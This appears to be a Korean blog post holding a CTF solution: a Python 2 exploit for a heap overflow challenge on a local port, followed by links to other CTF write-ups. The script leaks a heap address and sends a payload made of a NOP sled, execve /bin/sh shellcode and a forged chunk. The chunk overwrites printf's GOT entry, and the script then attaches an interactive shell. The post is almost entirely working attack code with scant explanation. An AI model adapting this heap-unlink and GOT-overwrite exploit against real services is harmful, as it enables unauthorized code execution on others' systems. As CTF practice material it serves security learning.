728x90
# heap overflow
# overwrite a chunk next heap
# overwrite GOT
#!/usr/bin/env python
import struct, telnetlib
from socket
import *
p = lambda x: struct.pack("<I", x)
host = 'localhost'
port = 3313
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
addr = ''
while( addr.find("][size=260]") == -1):
addr = s.recv(512)
tmp = ''
while( tmp.find("Write") == -1):
tmp = s.recv(1024)
print "## get the heap address ##"
addr = addr.split("[ALLOC][loc=")[1].split("][size=260]")[0]
if( len(addr) == 7 ):
addr = "0" + addr
tmp = ''
for i in range(6, -2, -2):
tmp += addr[i:i+2].decode('hex')
shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73"
shellcode += "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00"
shellcode += "\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd"
shellcode += "\x80"
addr = struct.unpack("<L", tmp)[0]
printf_got = 0x804c004
#[nop][shellcode][heap_size][next_chunk][prev]
payload = '\x90'*(260-len(shellcode))
payload += shellcode
payload += p(0x36d)
payload += p(addr) # next
payload += p(printf_got - 4) # prev
print "## send payload ##"
s.send(payload)
print "## get the shell ##"
t = telnetlib.Telnet()
t.sock = s
t.interact()
s.close() 728x90
'Security > [게임] CTF 풀이' 카테고리의 다른 글
| [exploit] 2013 SECUINSIDE reader writeups (0) | 2014.11.17 |
|---|---|
| [algorithm] DEFCON 22th 3dttt writeups (0) | 2014.05.22 |
| [REVERSING] backdoor2014 bin10, 100 writeup (0) | 2014.03.24 |
| [CRYPTO] backdoor2014 crypto10, 200-2 writeup (0) | 2014.03.24 |
| [NETWORK] backdoor2014 MISC250 writeup (0) | 2014.03.24 |
